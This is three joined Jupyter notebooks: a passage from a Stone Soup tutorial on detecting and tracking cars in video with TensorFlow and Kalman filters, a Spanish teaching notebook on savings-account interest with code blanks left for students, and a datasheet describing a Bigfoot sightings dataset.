end_time = datetime.timedelta(minutes=0, seconds=12)
frame_reader = VideoClipReader(VIDEO_PATH, start_time, end_time)
# It is also possible to apply clip transformations and effects, as per the
# `MoviePy documentation <https://zulko.github.io/moviepy/getting_started/effects.html>`_.
# The underlying MoviePy :class:`~VideoFileClip` instance can be accessed through the
# :attr:`~.VideoClipReader.clip` class property. For example, we can crop out 100 pixels from
# the top and left of the frames, as they are read by the reader, as shown below.
#
#
from moviepy.video.fx import all
frame_reader.clip = all.crop(frame_reader.clip, 100, 100)
num_frames = len(list(frame_reader.clip.iter_frames()))
# FFmpegVideoStreamReader
# ***********************
# For reference purposes, we also include here an example of how to build a
# :class:`~.FFmpegVideoStreamReader`. Let's assume that we have a camera which broadcasts its feed
# through a public RTSP stream, under the URL ``rtsp://192.168.55.10:554/stream``. We can build a
# :class:`~.FFmpegVideoStreamReader` object to read frames from this stream as follows:
#
# .. code:: python
#
# in_opts = {'threads': 1, 'fflags': 'nobuffer'}
# out_opts = {'format': 'rawvideo', 'pix_fmt': 'bgr24'}
# stream_url = 'rtsp://192.168.55.10:554/stream'
# video_reader = FFmpegVideoStreamReader(stream_url, input_opts=in_opts, output_opts=out_opts)
#
# .. important::
#
# Note that the above code is an illustrative example and will not be run.
#
# :attr:`~.FFmpegVideoStreamReader.input_opts` and :attr:`~.FFmpegVideoStreamReader.output_opts`
# are optional arguments, which allow users to specify options for the input and output FFmpeg
# streams, as documented by `FFmpeg <https://ffmpeg.org/ffmpeg.html#toc-Options>`__ and
# ffmpeg-python_.
#
#
# Reading frames from the reader
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# All :class:`~.FrameReader` objects, of which the :class:`~.VideoClipReader` is a subclass,
# generate frames in the form of :class:`~.ImageFrame` objects. Below we show an example of how to
# read and visualise these frames using `matplotlib`.
#
#
# +
from copy import copy
from PIL import Image
from matplotlib import pyplot as plt
from matplotlib import animation
fig, ax = plt.subplots(num="VideoClipReader output")
artists = []
print('Running FrameReader example...')
for timestamp, frame in frame_reader:
if not (len(artists)+1) % 10:
print("Frame: {}/{}".format(len(artists)+1, num_frames))
# Read the frame pixels
pixels = copy(frame.pixels)
# Plot output
image = Image.fromarray(pixels)
ax.axes.xaxis.set_visible(False)
ax.axes.yaxis.set_visible(False)
fig.tight_layout()
artist = ax.imshow(image, animated=True)
artists.append([artist])
ani = animation.ArtistAnimation(fig, artists, interval=20, blit=True, repeat_delay=200)
# -
# Using the :class:`~.TensorFlowBoxObjectDetector` class
# ------------------------------------------------------
# We now continue by demonstrating how to use the :class:`~.TensorFlowBoxObjectDetector` to detect
# objects, and more specifically cars, within the frames read in by our ``video_reader``. The
# :class:`~.TensorFlowBoxObjectDetector` can utilise both pre-trained and custom-trained TensorFlow
# object detection models which generate detection in the form of bounding boxes. In this example,
# we will make use of a pre-trained model from the
# `TensorFlow detection model zoo <https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md>`_,
# but the process of using a custom-trained TensorFlow model is the same.
#
#
# Downloading the model
# ~~~~~~~~~~~~~~~~~~~~~
# The code snippet shown below is used to download the object detection model checkpoint file
# (.pb) that we will feed into the :class:`~.TensorFlowBoxObjectDetector` , as well as the label
# file (.pbtxt) which contains a list of strings used to add the correct label to each detection
# (e.g. car).
#
# The particular detection algorithm we will use is the Faster-RCNN, with an Inception
# Resnet v2 backbone and running in Atrous mode with low proposals, pre-trained on the MSCOCO
# dataset.
#
# <div class="alert alert-danger"><h4>Warning</h4><p>**The downloaded model has a size of approximately 500 MB**. Therefore it is advised that you
# run the script on a stable (ideally not mobile) internet connection. The files will only be
# downloaded the first time the script is run. In consecutive runs the code will skip this step,
# provided that ``PATH_TO_CKPT`` and ``PATH_TO_LABELS`` are valid paths.</p></div>
#
#
# +
import urllib
import tarfile
MODEL_NAME = 'faster_rcnn_inception_resnet_v2_atrous_lowproposals_coco_2018_01_28'
MODEL_TAR = MODEL_NAME + '.tar.gz'
MODELS_DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
PATH_TO_CKPT = os.path.join(os.getcwd(), MODEL_NAME + '/frozen_inference_graph.pb')
# Download and extract model
if not os.path.exists(PATH_TO_CKPT):
print("Downloading model. This may take a while...")
urllib.request.urlretrieve(MODELS_DOWNLOAD_BASE + MODEL_TAR, MODEL_TAR)
tar_file = tarfile.open(MODEL_TAR)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, os.getcwd())
tar_file.close()
os.remove(MODEL_TAR)
LABEL_FILE = 'mscoco_label_map.pbtxt'
LABELS_DOWNLOAD_BASE = \
'https://raw.githubusercontent.com/tensorflow/models/master/research/object_detection/data/'
PATH_TO_LABELS = os.path.join(os.getcwd(), "{}/{}".format(MODEL_NAME, LABEL_FILE))
# Download labels
if not os.path.exists(PATH_TO_LABELS):
print("Downloading label file...")
urllib.request.urlretrieve(LABELS_DOWNLOAD_BASE + LABEL_FILE, PATH_TO_LABELS)
# -
# Building the detector
# ~~~~~~~~~~~~~~~~~~~~~
# Next, we proceed to initialise our detector object. To do this, we require the ``frame_reader``
# object we built previously, as well as a path to the (downloaded) model checkpoint (.pb) and
# label (.pbtxt) files, which we have already defined above under the ``PATH_TO_CKPT`` and
# ``PATH_TO_LABELS`` variables.
#
# The :class:`~.TensorFlowBoxObjectDetector` object can optionally be configured to digest frames
# from the provided reader asynchronously, and only perform detection on the last frame digested,
# by setting ``run_async=True``.This is suitable when the detector is applied to readers generating
# a live feed (e.g. the :class:`~.FFmpegVideoStreamReader`), where real-time processing is
# paramount. Since we are using a :class:`~.VideoClipReader` in this example, we set
# ``run_async=False``, which is also the default setting.
#
# Finally, the ``session_config`` parameter can be used to provide a `ConfigProto
# <https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto>`_ protocol buffer with
# configuration options for the TensorFlow session run by the detector. Below we show an example of
# how this can be used to prevent TensorFlow from mapping all of the GPU memory, which can lead to
# cuDNN errors when the host GPU is used by other processes.
#
#
# +
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # Suppress TensorFlow logging
import tensorflow as tf
from stonesoup.detector.tensorflow import TensorFlowBoxObjectDetector
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True # Allow dynamic allocation of GPU memory to TF session
run_async = False # Configure the detector to run in synchronous mode
detector = TensorFlowBoxObjectDetector(frame_reader, PATH_TO_CKPT, PATH_TO_LABELS,
run_async=run_async, session_config=config)
# -
# Filtering-out unwanted detections
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# In this section we showcase how we can utilise Stone Soup :class:`~.Feeder` objects in order to
# filter out unwanted detections. One example of feeder we can use is the
# :class:`~.MetadataValueFilter`, which allows us to filter detections by applying a custom
# operator on particular fields of the :attr:`~.Detection.metadata` property of detections.
#
# Each detection generated by :class:`~.TensorFlowBoxObjectDetector` carries the following
# :attr:`~.Detection.metadata` fields:
#
# - ``raw_box``: The raw bounding box containing the normalised coordinates ``[y_0, x_0, y_1, x_1]``, as generated by TensorFlow.
# - ``class``: A dict with keys ``id`` and ``name`` relating to the id and name of the detection class.
# - ``score``: A float in the range ``(0, 1]`` indicating the detector's confidence.
#
# Detection models trained on the MSCOCO dataset, such as the one we downloaded, are able to detect
# 90 different classes of objects (see the `downloaded .pbtxt file <https://github.com/tensorflow/models/blob/master/research/object_detection/data/mscoco_label_map.pbtxt>`_
# for a full list). Instead, as we discussed at the beginning of the tutorial, we wish to limit the
# detections to only those classified as cars. This can be done as follows:
#
#
from stonesoup.feeder.filter import MetadataValueFilter
detector = MetadataValueFilter(detector, 'class', lambda x: x['name'] == 'car')
# Continuing, we may want to filter out detections which have a low confidence score:
#
#
detector = MetadataValueFilter(detector, 'score', lambda x: x > 0.1)
# Finally, we observed that the detector tends to incorrectly generate detections which are much
# larger the the size we expect for a car. Therefore, we can filter out those detections by only
# allowing ones whose width is less the 20\% of the frame width (i.e. ``x_1-x_0 < 0.2``):
#
#
detector = MetadataValueFilter(detector, 'raw_box', lambda x: x[3]-x[1] < 0.2)
# You are encouraged to comment out any/all of the above filter definitions and observe the
# produced output.
#
#
# Reading and visualising detections
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Detections generated by the :class:`~.TensorFlowBoxObjectDetector` have a 4-dimensional
# :attr:`~.Detection.state_vector` in the form of a bounding boxes that captures the area of the
# frame where an object is detected. Each bounding box is represented by a vector of the form
# ``[x, y, w, h]``, where ``x, y`` denote the relative pixel coordinates of the top-left corner,
# while ``w, h`` denote the relative width and height of the bounding box. Below we show an example
# of how to read and visualise these detections using `matplotlib`.
#
#
# +
import numpy as np
from PIL import ImageDraw
def draw_detections(image, detections, show_class=False, show_score=False):
""" Draw detections on an image
Parameters
----------
image: :class:`PIL.Image`
Image on which to draw the detections
detections: : set of :class:`~.Detection`
A set of detections generated by :class:`~.TensorFlowBoxObjectDetector`
show_class: bool
Whether to draw the class of the object. Default is ``False``
show_score: bool
Whether to draw the score of the object. Default is ``False``
Returns
-------
: :class:`PIL.Image`
Image with detections drawn
"""
draw = ImageDraw.Draw(image)
for detection in detections:
x0, y0, w, h = np.array(detection.state_vector).reshape(4)
x1, y1 = (x0 + w, y0 + h)
draw.rectangle([x0, y0, x1, y1], outline=(0, 255, 0), width=1)
class_ = detection.metadata['class']['name']
score = round(float(detection.metadata['score']),2)
if show_class and show_score:
draw.text((x0,y1 + 2), '{}:{}'.format(class_, score), fill=(0, 255, 0))
elif show_class:
draw.text((x0, y1 + 2), '{}'.format(class_), fill=(0, 255, 0))
elif show_score:
draw.text((x0, y1 + 2), '{}'.format(score), fill=(0, 255, 0))
del draw
return image
fig2, ax2 = plt.subplots(num="TensorFlowBoxObjectDetector output")
artists2 = []
print("Running TensorFlowBoxObjectDetector example... Be patient...")
for timestamp, detections in detector:
if not (len(artists2)+1) % 10:
print("Frame: {}/{}".format(len(artists2)+1, num_frames))
# Read the frame pixels
frame = frame_reader.frame
pixels = copy(frame.pixels)
# Plot output
image = Image.fromarray(pixels)
image = draw_detections(image, detections, True, True)
ax2.axes.xaxis.set_visible(False)
ax2.axes.yaxis.set_visible(False)
fig2.tight_layout()
artist = ax2.imshow(image, animated=True)
artists2.append([artist])
ani2 = animation.ArtistAnimation(fig2, artists2, interval=20, blit=True, repeat_delay=200)
# -
# Constructing a Multi-Object Video Tracker
# -----------------------------------------
# In this final segment of the tutorial we will see how we can use the above demonstrated
# components to perform tracking of multiple objects within Stone Soup.
#
# Defining the state-space models
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Transition Model
# ****************
# We begin our definition of the state-space models by defining the hidden state
# $\mathrm{x}_k$, i.e. the state that we wish to estimate:
#
# \begin{align}\mathrm{x}_k = [x_k, \dot{x}_k, y_k, \dot{y}_k, w_k, h_k]\end{align}
#
# where $x_k, y_k$ denote the pixel coordinates of the top-left corner of the bounding box
# containing an object, with $\dot{x}_k, \dot{y}_k$ denoting their respective rate of change,
# while $w_k$ and $h_k$ denote the width and height of the box, respectively.
#
# We assume that $x_k$ and $y_k$ move with nearly :class:`~.ConstantVelocity`, while
# $w_k$ and $h_k$ evolve according to a :class:`~.RandomWalk`.Using these assumptions,
# we proceed to construct our Stone Soup :class:`~.TransitionModel` as follows:
#
#
from stonesoup.models.transition.linear import (CombinedLinearGaussianTransitionModel,
ConstantVelocity, RandomWalk)
t_models = [ConstantVelocity(20**2), ConstantVelocity(20**2), RandomWalk(20**2), RandomWalk(20**2)]
transition_model = CombinedLinearGaussianTransitionModel(t_models)
# Measurement Model
# *****************
# Continuing, we define the measurement state $\mathrm{y}_k$, which follows naturally from
# the form of the detections generated by the :class:`~.TensorFlowBoxObjectDetector` we previously
# discussed:
#
# \begin{align}\mathrm{y}_k = [x_k, y_k, w_k, h_k]\end{align}
#
# We make use of a 4-dimensional :class:`~.LinearGaussian` model as our :class:`~.MeasurementModel`,
# whereby we can see that the individual indices of $\mathrm{y}_k$ map to indices `[0,2,4,5]`
# of the 6-dimensional state $\mathrm{x}_k$:
#
#
from stonesoup.models.measurement.linear import LinearGaussian
measurement_model = LinearGaussian(ndim_state=6, mapping=[0, 2, 4, 5],
noise_covar=np.diag([1**2, 1**2, 3**2, 3**2]))
# Defining the tracker components
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# With the state-space models defined, we proceed to build our tracking components
#
# Filtering
# *********
# Since we have assumed Linear-Gaussian models, we will be using a Kalman Filter to perform
# filtering of the underlying single-target densities. This is done by making use of the
# :class:`~.KalmanPredictor` and :class:`~.KalmanUpdater` classes, which we define below:
#
#
from stonesoup.predictor.kalman import KalmanPredictor
predictor = KalmanPredictor(transition_model)
from stonesoup.updater.kalman import KalmanUpdater
updater = KalmanUpdater(measurement_model)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the Stone
# Soup tutorial on
# `using the Kalman Filter <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/01_KalmanFilterTutorial.html>`_.</p></div>
#
# Data Association
# ****************
# We utilise a :class:`~.DistanceHypothesiser` to generate hypotheses between tracks and
# measurements, where :class:`~.Mahalanobis` distance is used as a measure of quality:
#
#
from stonesoup.hypothesiser.distance import DistanceHypothesiser
from stonesoup.measures import Mahalanobis
hypothesiser = DistanceHypothesiser(predictor, updater, Mahalanobis(), 10)
# Continuing the :class:`~.GNNWith2DAssigment` class is used to perform fast joint data association,
# based on the Global Nearest Neighbour (GNN) algorithm:
#
#
from stonesoup.dataassociator.neighbour import GNNWith2DAssignment
data_associator = GNNWith2DAssignment(hypothesiser)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the
# `Data Association - clutter <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/05_DataAssociation-Clutter.html>`_
# and `Data Association - Multi-Target Tracking <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/06_DataAssociation-MultiTargetTutorial.html>`_
# tutorials.</p></div>
#
#
# Track Initiation
# ****************
# For initialising tracks we will use a :class:`~.MultiMeasurementInitiator`, which allows our
# tracker to tentatively initiate tracks from unassociated measurements, and hold them within the
# initiator until they have survived for at least 10 frames. We also define a
# :class:`~.UpdateTimeStepsDeleter` deleter to be used by the initiator to delete tentative tracks
# that have not been associated to a measurement in the last 3 frames.
#
#
from stonesoup.types.state import GaussianState
from stonesoup.types.array import CovarianceMatrix, StateVector
from stonesoup.initiator.simple import MultiMeasurementInitiator
from stonesoup.deleter.time import UpdateTimeStepsDeleter
prior_state = GaussianState(StateVector(np.zeros((6,1))),
CovarianceMatrix(np.diag([100**2, 30**2, 100**2, 30**2, 100**2, 100**2])))
deleter_init = UpdateTimeStepsDeleter(time_steps_since_update=3)
initiator = MultiMeasurementInitiator(prior_state, measurement_model, deleter_init,
data_associator, updater, min_points=10)
# Track Deletion
# **************
# For confirmed tracks we used again a :class:`~.UpdateTimeStepsDeleter`, but this time configured
# to delete tracks after they have not bee associated to a measurement in the last 15 frames.
#
#
deleter = UpdateTimeStepsDeleter(time_steps_since_update=15)
# <div class="alert alert-info"><h4>Note</h4><p>For more information on the above classes and how they operate you can refer to the Stone
# `Initiators & Deleters <https://stonesoup.readthedocs.io/en/latest/auto_tutorials/09_Initiators_&_Deleters.html>`_
# tutorial.</p></div>
#
# Building the tracker
# ~~~~~~~~~~~~~~~~~~~~
# Now that we have defined all our tracker components we proceed to build our multi-target tracker:
#
#
from stonesoup.tracker.simple import MultiTargetTracker
tracker = MultiTargetTracker(
initiator=initiator,
deleter=deleter,
detector=detector,
data_associator=data_associator,
updater=updater,
)
# Running the tracker
# ~~~~~~~~~~~~~~~~~~~
#
#
# +
def draw_tracks(image, tracks, show_history=True, show_class=True, show_score=True):
""" Draw tracks on an image
Parameters
----------
image: :class:`PIL.Image`
Image on which to draw the tracks
detections: : set of :class:`~.Tracks`
A set of tracks generated by our :class:`~.MultiTargetTracker`
show_history: bool
Whether to draw the trajectory of the track. Default is ``True``
show_class: bool
Whether to draw the class of the object. Default is ``True``
show_score: bool
Whether to draw the score of the object. Default is ``True``
Returns
-------
: :class:`PIL.Image`
Image with tracks drawn
"""
draw = ImageDraw.Draw(image)
for track in tracks:
bboxes = np.array([np.array(state.state_vector[[0, 2, 4, 5]]).reshape(4)
for state in track.states])
x0, y0, w, h = bboxes[-1]
x1 = x0 + w
y1 = y0 + h
draw.rectangle([x0, y0, x1, y1], outline=(255, 0, 0), width=2)
if show_history:
pts = [(box[0] + box[2] / 2, box[1] + box[3] / 2) for box in bboxes]
draw.line(pts, fill=(255, 0, 0), width=2)
class_ = track.metadata['class']['name']
score = round(float(track.metadata['score']), 2)
if show_class and show_score:
draw.text((x0, y1 + 2), '{}:{}'.format(class_, score), fill=(255, 0, 0))
elif show_class:
draw.text((x0, y1 + 2), '{}'.format(class_), fill=(255, 0, 0))
elif show_score:
draw.text((x0, y1 + 2), '{}'.format(score), fill=(255, 0, 0))
return image
fig3, ax3 = plt.subplots(num="MultiTargetTracker output")
fig3.tight_layout()
artists3 = []
print("Running MultiTargetTracker example... Be patient...")
for timestamp, tracks in tracker:
if not (len(artists3) + 1) % 10:
print("Frame: {}/{}".format(len(artists3) + 1, num_frames))
# Read the detections
detections = detector.detections
# Read frame
frame = frame_reader.frame
pixels = copy(frame.pixels)
# Plot output
image = Image.fromarray(pixels)
image = draw_detections(image, detections)
image = draw_tracks(image, tracks)
ax3.axes.xaxis.set_visible(False)
ax3.axes.yaxis.set_visible(False)
fig3.tight_layout()
artist = ax3.imshow(image, animated=True)
artists3.append([artist])
ani3 = animation.ArtistAnimation(fig3, artists3, interval=20, blit=True, repeat_delay=200)
| docs/source/auto_demos/Video_Processing.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Modelo del rendimiento de una cuenta de ahorro
#
# <img style="center" src="https://static.pexels.com/photos/9660/business-money-pink-coins.jpg" width="500px" height="200px" alt="atom"/>
#
# > **¿Tiene el dinero el mismo valor a lo largo del tiempo?** La respuesta es *no*. Todos lo hemos vivido.
#
# > Dos situaciones básicas:
# 1. <font color=blue>Inflación</font>: ¿Cuánto dinero necesitabas para comprar unas papas y un refresco hace 10 años? ¿Cuánto necesitas hoy?
# 2. <font color=blue>Interés</font>: no es lo mismo tener \$10000 MXN disponibles hoy a recibir \$10000 MXN en un año, pues los primeros pueden ser invertidos en un negocio o una cuenta bancaria para generar *interés*. Por lo tanto los \$10000 MXN disponibles hoy valen más que los \$10000 MXN que se recibirán en un año.
#
# Referencia:
# - <NAME>, <NAME>. *Ingeniería económica básica*, ISBN: 978-607-519-017-4. (Disponible en biblioteca)
# Referencias:
# - http://www.sympy.org
# - http://matplotlib.org
# - http://www.numpy.org
# - http://ipywidgets.readthedocs.io/en/latest/index.html
# ___
# ## Interés
# Nos centraremos en como cambia el valor del dinero en el tiempo debido al **interés**. Existen dos tipos:
# ### Capitalización por interés simple
# Este tipo de interés se calcula <font color=red>única y exclusivamente sobre la cantidad original que se invirtió</font>. Como consecuencia, el interés generado no forma parte del dinero que se invierte, es decir, los <font color=blue>intereses no ganan intereses</font>.
#
# Suponga que se tiene un capital inicial $C_0$ y se invierte a un plazo de $k$ periodos (pueden ser meses, trimestres, semestres, años...) a una tasa de **interés simple** por periodo $i$. Al final del primer periodo, el capital $C_1$ que se obtiene es:
#
# $$C_1=C_0+iC_0=C_0(1+i).$$
#
# De la misma manera, como el interés solo se calcula sobre el capital inicial, al final del segundo periodo, el capital $C_2$ que se obtiene es:
#
# $$C_2=C_1+iC_0=C_0+iC_0+iC_0=C_0(1+2i).$$
#
# Así, al final del $k-$ésimo periodo, el capital $C_k$ que se obtiene es:
#
# $$C_k=C_{k-1}+iC_0=C_0+kiC_0=C_0(1+ki).$$
# > **Ejemplo.** Suponga que se tiene un capital de \$10000 MXN, el cual se pone en un fondo de inversión que paga una tasa de interés simple del 0.8% mensual.
#
# > Si se tiene una meta de ahorro de \$11000 MXN sin inversiones adicionales, ¿cuántos meses se debería dejar invertido el dinero?
# +
# Librería para cálculo numérico
import numpy as np
# Valores dados en el enunciado
# Despejamos k tal que C_k=meta
k = # Notar el uso de la función ceil (no se puede tener un número no entero de periodos)
k = # Conversión a entero (para visualización)
C_k = # Cálculo del capital al final del periodo k
C_k = # Redondeo con dos cifras decimales
# Imprimimos respuesta en pantalla
print("El número de periodos que se debe dejar invertido el dinero es ", k,". Al final del periodo ", k,
", el capital es ", C_k, ".", sep="")
# -
# > <font color=blue>**Actividad.**</font>
# > - ¿Qué pasa si el interés no es del 0.8% mensual sino del 1% mensual?
# > - ¿Qué pasa si la meta no son \$11000 MXN si no \$12000 MXN?
# +
# Solución
# -
# > Una gráfica que nos permite ilustrar la situación anterior se puede realizar de la siguiente manera.
# +
# Librerías para gráficos
import matplotlib.pyplot as plt
# Para que se muestren las gráficas en la misma ventana
# %matplotlib inline
# Librería para widgets de jupyter
from ipywidgets import *
def interes_simple(C_0, meta, i):
# Despejamos k
k = np.ceil((meta/C_0 - 1)/i) # Notar el uso de la función ceil
k = k.astype(int) # Conversión a entero
C_k = C_0*(1+k*i) # Cálculo del capital al final del periodo k
C_k = round(C_k, 2) # Redondeo con dos cifras decimales
# Vector de periodos
kk =
# Vector de capitales por periodo
CC =
# Gráfico
plt. # Figura 1, borrar lo que contenga
plt. # Se grafica la evolución de los capitales
plt. # Se grafica la meta
plt.xlabel('k') # Etiqueta eje x
plt.ylabel('C_k') # Etiqueta eje y
plt.grid(True) # Malla en la gráfica
plt.show() # Mostrar la figura
print("El número de periodos que se debe dejar invertido el dinero para llegar a la meta de ", meta," es ", k,
". Al final del periodo ", k,", el capital es ", C_k, ".", sep="")
interact_manual(interes_simple, C_0=fixed(10000), meta=(10000,12000,100), i=fixed(0.008));
# -
# Como se esperaba, el capital en el $k-$ésimo periodo $C_k=C_0(1+ki)$ crece linealmente con $k$.
# ### Capitalización por interés compuesto
# El capital que genera el interés simple permanece constante todo el tiempo de duración de la inversión. En cambio, el que produce el interés compuesto en un periodo se <font color=red>convierte en capital en el siguiente periodo</font>. Esto es, el interés generado al final de un periodo <font color=blue>se reinvierte para el siguiente periodo para también producir interés</font>.
#
# Suponga que se tiene un capital inicial $C_0$, y se va a ceder el uso de este capital por un periodo de tiempo determinado a una tasa de interés $i$. El capital que se obtiene al final del primer periodo $C_1$ se puede calcular por
#
# $$C_1=C_0(1+i).$$
#
# Si la anterior suma se vuelve a ceder a la misma tasa de interés, al final del periodo dos el capital $C_2$ es
#
# $$C_2=C_1(1+i)=C_0(1+i)^2.$$
#
# Si se repite el anterior proceso $k$ veces, el capital al final del $k-$ésimo periodo $C_k$ es
#
# $$C_k=C_{k-1}(1+i)=C_0(1+i)^k.$$
#
# **Referencia**:
# - https://es.wikipedia.org/wiki/Inter%C3%A9s_compuesto.
# > **Ejemplo.** Suponga que se tiene un capital de \$10000 MXN, el cual se pone en un fondo de inversión que paga una tasa de interés del 0.8% mensual.
#
# > Si se tiene una meta de ahorro de \$11000 MXN sin inversiones adicionales, ¿cuántos meses se debería dejar invertido el dinero?
#
# > Muestre una gráfica que ilustre la situación.
# +
def interes_compuesto(C_0, meta, i):
# Despejamos k
k = np.ceil(np.log(meta/C_0)/np.log(1+i))
k = k.astype(int)
C_k = C_0*(1+i)**k # Cálculo del capital al final del periodo k
C_k = round(C_k,2) # Redondeo con dos cifras decimales
# Vector de periodos
kk = np.linspace(0,k,k+1)
# Vector de capitales por periodo
CC = C_0*(1+i)**kk
# Gráfico
plt.figure(num=1); plt.clf() # Figura 1, borrar lo que contenga
plt.plot(kk, CC,'*',linewidth=3.0) # Se grafica la evolución de los capitales
plt.plot(kk,meta*np.ones(k+1),'--k') # Se grafica la meta
plt.xlabel('k') # Etiqueta eje x
plt.ylabel('C_k') # Etiqueta eje y
plt.grid(True) # Malla en la gráfica
plt.show() # Mostrar la figura
print("El número de periodos que se debe dejar invertido el dinero para llegar a la meta de ", meta," es ", k,
". Al final del periodo ", k,", el capital es ", C_k, ".", sep="")
interact_manual(
# -
# El capital en el $k-$ésimo periodo $C_k=C_0(1+i)^k$ crece de manera exponencial con $k$.
# > <font color=blue>**Actividad.**</font>
# > - Modificar el código anterior para dejar fija la meta de ahorro y variar la tasa de interés compuesta.
# ### Capitalización continua de intereses
# La capitalización continua se considera un tipo de capitalización compuesta, en la que a cada instante de tiempo $t$ se se capitalizan los intereses. Es decir, la frecuencia de capitalización es infinita (o, equivalentemente, el periodo de capitalización tiende a cero).
#
# Suponga que se tiene un capital inicial $C_0$, y que el capital acumulado en el tiempo $t$ es $C(t)$. Queremos saber cuanto será el capital pasado un periodo de tiempo $\Delta t$, dado que la tasa de interés efectiva para este periodo de tiempo es $i$. De acuerdo a lo anterior tenemos
#
# $$C(t+\Delta t)=C(t)(1+i)=C(t)(1+r\Delta t),$$
#
# donde $r=\frac{i}{\Delta t}$ es la tasa de interés instantánea. Manipulando la anterior expresión, obtenemos
#
# $$\frac{\log(C(t+\Delta t))-\log(C(t))}{\Delta t}=\frac{\log((1+r\Delta t))}{\Delta t}.$$
#
# Haciendo $\Delta t\to 0$, obtenemos la siguiente ecuación diferencial
#
# $$\frac{d C(t)}{dt}=r\; C(t),$$
#
# sujeta a la condición inicial (monto o capital inicial) $C(0)=C_0$.
#
# La anterior, es una ecuación diferencial lineal de primer orden, para la cual se puede calcular la *solución analítica*.
# +
# Librería de cálculo simbólico
import sympy as sym
# Para imprimir en formato TeX
from sympy import init_printing; init_printing(use_latex='mathjax')
from IPython.display import display
# Símbolos t(para el tiempo) y r(para el interés instantáneo)
#t, r = sym.symbols('t r')
# Otra forma de hacer lo anterior
# -
# Ecuación diferencial
# Mostrar ecuación
# Resolver
# con $C_1=C_0$.
#
# La equivalencia entre la tasa de interés compuesta $i$ y la tasa de interés instantánea $r$ viene dada por
#
# $$e^r=1+i.$$
# ___
# ¿Cómo podemos calcular la *solución numérica*?
# +
# Librerías para integración numérica
from scipy.integrate import odeint
# Modelo de capitalización continua
# +
def interes_continuo(C_0, meta, r):
# Despejamos t
t = np.log(meta/C_0)/r
# Vector de periodos
tt = np.linspace(0,t,100)
# Vector de capitales por periodo
---->
# Gráfico
plt.figure(num=1); plt.clf() # Figura 1, borrar lo que contenga
plt.plot(tt, CC,'-',linewidth=3.0) # Se grafica la evolución de los capitales
plt.plot(tt,meta*np.ones(len(tt)),'--k') # Se grafica la meta
plt.xlabel('t') # Etiqueta eje x
plt.ylabel('C(t)') # Etiqueta eje y
plt.grid(True) # Malla en la gráfica
plt.show() # Mostrar la figura
# -
# Ver que lo anterior es una aproximación continua del modelo discreto de interés continuo cuando la frecuencia de capitalización tiende a infinito
# > <font color=blue>**Actividad.**</font>
# > - Averiguar tasas de interés reales en algún banco y proyectar un ahorro mensual para que al terminar su carrera tengan \$50000 MXN en su cuenta.
# !open .
| Modulo2/Clase_ModeloAhorro_Mod.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Datasheet for Bigfoot Sightings Dataset
# <NAME>
#
# Applied Data Science
# ## Motivation for Dataset Creation
#
# ### Why was the dataset created?
# The compiled dataset of Bigfoot sighting reports concatenated with location and weather data was created to analyze and map geographical trends in Bigfoot sightings.
# ### What (other) tasks could the dataset be used for?
# While the dataset was not created by individuals searching for Bigfoot, one obvious implication could be to track down Bigfoot based on past sightings.
# The dataset should not be used to track down individuals making reports of Bigfoot sightings, and there are no names associated with the individual reports.
# ### Has the dataset been used for any tasks already?
# This dataset has been used to derive geographical trends and insights in Bigfoot sightings. The creator of the dataset published a blog post detailing his work with the dataset: https://timothyrenner.github.io/datascience/2017/06/30/finding-bigfoot.html
#
# ### Who funded the creation of the dataset?
# No direct funding for the creation of this dataset.
#
#
# ## Dataset Composition
# ### What are the instances?
# Each instance is a Bigfoot sighting report scraped from the BFRO website. It contains the full-text report along with other associated data, including location and weather.
#
# ### Are relationships between instances made explicit in the data?
# Because each report is treated as a discrete instance, there are no explicit relationships between them in the dataset. While relationships may exist between the individual reports, they are not made clear in the data.
#
# ### How many instances of each type are there?
# There are 4,586 Bigfoot sighting reports.
#
# ### What data does each instance consist of?
# Each instance consists of full text of the report, description of location details, county, state, title of report, latitude, longitude, date, report number, report classification and geohash. Each report is concatenated with weather data that includes for each instance: high, middle, and low temperature, dew point, humidity, cloud cover, moon phase, precipitation intensity, precipitation probability, precipitation type, pressure, UV index, visibility, wind bearing, wind speed, and summary of weather.
#
# ### Is everything included or does the data rely on external resources?
# Everything is included.
#
# ### Are there recommended data splits or evaluation measures?
# Unknown.
#
# ### What experiments were initially run on this dataset?
# The creator of the dataset published a blog post detailing his work with the dataset: https://timothyrenner.github.io/datascience/2017/06/30/finding-bigfoot.html
#
# ## Data Collection Process
# ### How was the data collected?
# The reports were scraped from the BFRO website www.bfro.net. The weather conditions were powered by Dark Sky API.
# Code for pulling the data can be found here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Who was involved in the data collection process?
# <NAME> is the sole contributor to the collection of this dataset.
#
# ### Over what time-frame was the data collected?
# The BFRO database has been in existence since 1995, but the reports date back to the 1920’s.
#
# ### How was the data associated with each instance acquired?
# The reports were submitted as form responses by individuals. The weather data was acquired via Dark Sky API.
#
# ### Does the dataset contain all possible instances?
# Yes. It is not a sample of a larger set of reports. However, it only contains instances of reports entered in this particular database.
#
# ### Is there information missing from the dataset and why?
# Yes. Some reports exclude information for privacy reasons.
#
